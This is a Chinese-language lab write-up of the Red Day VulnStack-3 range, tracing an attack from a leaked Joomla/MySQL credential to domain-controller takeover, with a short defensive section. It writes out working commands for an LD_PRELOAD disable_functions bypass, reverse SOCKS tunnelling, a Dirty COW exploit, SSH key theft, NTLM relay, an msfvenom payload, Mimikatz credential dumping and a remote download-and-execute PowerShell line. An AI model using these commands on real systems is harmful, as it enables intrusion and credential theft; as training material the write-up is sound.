红日靶场实战:从MySQL泄露到域控突破的全链路渗透记录(附避坑指南)
红队实战:基于ATT&CK框架的靶场渗透全流程解析
1. 靶场环境与攻击路径概览
红日靶场作为国内知名的攻防演练环境,完美模拟了企业从外网到内网的完整攻击面。本次实战将围绕VulnStack-3靶机,展示如何从Web应用漏洞入手,逐步突破边界防御,最终获取域控权限的全过程。与基础教程不同,我们将结合ATT&CK矩阵的战术阶段,重点分析以下攻击链:
初始访问 → 执行权限获取 → 权限提升 → 防御规避 → 凭证访问 → 横向移动 → 目标达成典型技术节点包括:
- MySQL凭据泄露利用
- disable_functions绕过技术
- 内网代理隧道搭建
- NTLM Relay攻击实战
- 域环境下的权限维持
提示:所有操作均在授权环境下进行,实际渗透测试必须获得书面授权
2. 外网突破:从Web漏洞到系统权限
2.1 信息收集与漏洞定位
通过基础扫描发现目标开放服务:
nmap -sV -T4 192.168.119.118关键发现:
- 80端口:Joomla CMS
- 3306端口:MySQL服务
利用目录爆破发现敏感文件:
python3 dirsearch.py -u http://192.168.119.118 -e php/configuration.php泄露数据库凭据:
public $user = 'testuser'; public $password = 'cvcvgjASD!@';2.2 MySQL服务利用实战
通过泄露凭据远程连接MySQL:
mysql -h 192.168.119.118 -u testuser -p'cvcvgjASD!@'关键操作步骤:
- 定位用户表:
use joomladb; show tables; - 添加管理员账户:
UPDATE am2zu_users SET password=MD5('secret') WHERE username='admin'; - 设置权限组:
INSERT INTO am2zu_user_usergroup_map VALUES (42,8);
2.3 突破disable_functions限制
获取Webshell后遇到命令执行限制,通过LD_PRELOAD技术绕过:
// exploit1.php putenv("LD_PRELOAD=/tmp/hack.so"); mail("","","","");编译恶意so文件:
gcc -shared -fPIC -o hack.so hack.c关键函数劫持:
// hack.c void _init() { unsetenv("LD_PRELOAD"); system("id > /tmp/exploit"); }3. 内网渗透:代理与横向移动
3.1 网络拓扑探测
获取内网信息:
ifconfig # 发现192.168.93.0/24网段 cat /etc/hosts # 查看主机映射关系 arp -a # 发现存活主机3.2 多层代理搭建方案
使用EarthWorm建立Socks5代理:
# 攻击机 ./ew -s rcsocks -l 1080 -e 8888 # 跳板机 ./ew -s rssocks -d 攻击机IP -e 8888Proxychains配置:
# /etc/proxychains.conf socks5 127.0.0.1 10803.3 权限提升与凭证窃取
利用脏牛漏洞提权:
gcc -pthread dirty.c -o dirty -lcrypt ./dirty mypassword获取root权限后导出SSH密钥:
cat /root/.ssh/id_rsa4. 域环境突破实战
4.1 NTLM Relay攻击详解
搭建恶意SMB服务器:
impacket-smbrelayx -h 目标IP -e payload.exe生成钓鱼载荷:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=跳板机IP -f exe > payload.exe4.2 域控定位与接管
使用PVEFindADUser定位域管会话:
.\PVEFindADUser.exe -current通过Mimikatz获取域管凭据:
privilege::debug sekurlsa::logonpasswords最终接管域控:
Enter-PSSession -ComputerName DC01 -Credential (Get-Credential)5. 防御视角的思考
从蓝队角度分析攻击链中的关键防御点:
| 攻击阶段 | 防御措施 | 检测方法 |
|---|---|---|
| 初始访问 | 配置文件权限控制 | 异常数据库连接告警 |
| 权限提升 | 及时修补内核漏洞 | SUID文件变更监控 |
| 横向移动 | 网络分段隔离 | 异常SMB流量分析 |
| 凭证窃取 | LSA保护启用 | 可疑进程访问lsass.exe |
在实战中发现,80%的突破都源于基础安全配置疏忽。建议企业定期进行:
- 敏感文件权限审计
- 服务账户密码轮换
- 域管会话异常监控
6. 典型问题解决方案
场景1:代理隧道不稳定
- 改用reGeorg+Proxifier组合
- 调整TCP超时参数:
echo 30 > /proc/sys/net/ipv4/tcp_keepalive_time
场景2:杀软拦截Mimikatz
- 使用C#版Mimikatz(SharpKatz)
- 内存加载执行:
IEX (New-Object Net.WebClient).DownloadString('http://1.1.1.1/Invoke-ReflectivePEInjection.ps1')
场景3:内网主机发现不全
- 组合使用多种探测方式:
# ARP扫描 proxychains arp-scan -l # ICMP探测 proxychains fping -g 192.168.93.0/24
在最后的内网渗透阶段,采用多线程扫描可以显著提升效率。实际测试中,当遇到网络延迟较高的情况,将线程数控制在20-30之间能达到最佳效果。